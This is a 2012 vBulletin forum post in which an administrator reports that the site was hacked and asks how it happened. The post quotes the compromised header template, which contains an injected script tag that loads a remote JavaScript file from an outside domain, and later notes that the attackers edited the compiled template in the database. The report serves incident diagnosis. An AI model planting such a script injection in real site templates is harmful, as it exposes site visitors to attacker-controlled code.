Thread: How to use external.php to inject a call to a javascript?
View Single Post
  #1  
Old 06-05-2012, 07:33 AM
Spinball's Avatar
Spinball Spinball is offline
 
Join Date: Feb 2002
Location: Telford, England
Posts: 705
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default How to use external.php to inject a call to a javascript?
We were hacked last night. Somehow they used external.php called in the headinclude template to include a chinese .js:

HTML Code:
<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" /> <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script><script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
I closed the site, edited headinclude to remove the external.php reference to check that it was the cause. It was. Then I re-added the line but the chinese js code did not reappear.

Does anyone have any idea how they did this?
There was no change to the plugins, files, access via the control panel or anything else suspicious which we could spot.

--------------- Added [DATE]1338890536[/DATE] at [TIME]1338890536[/TIME] ---------------

Ok, it seems they edited the template table, inserting a link to their js into the compiled headinclude template.
Reply With Quote
 
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01264 seconds
  • Memory Usage 1,766KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD_SHOWPOST
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_html
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_box
  • (1)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit_info
  • (1)postbit
  • (1)postbit_onlinestatus
  • (1)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • reputationlevel
  • showthread
Included Files:
  • ./showpost.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showpost_start
  • bbcode_fetch_tags
  • bbcode_create
  • postbit_factory
  • showpost_post
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • showpost_complete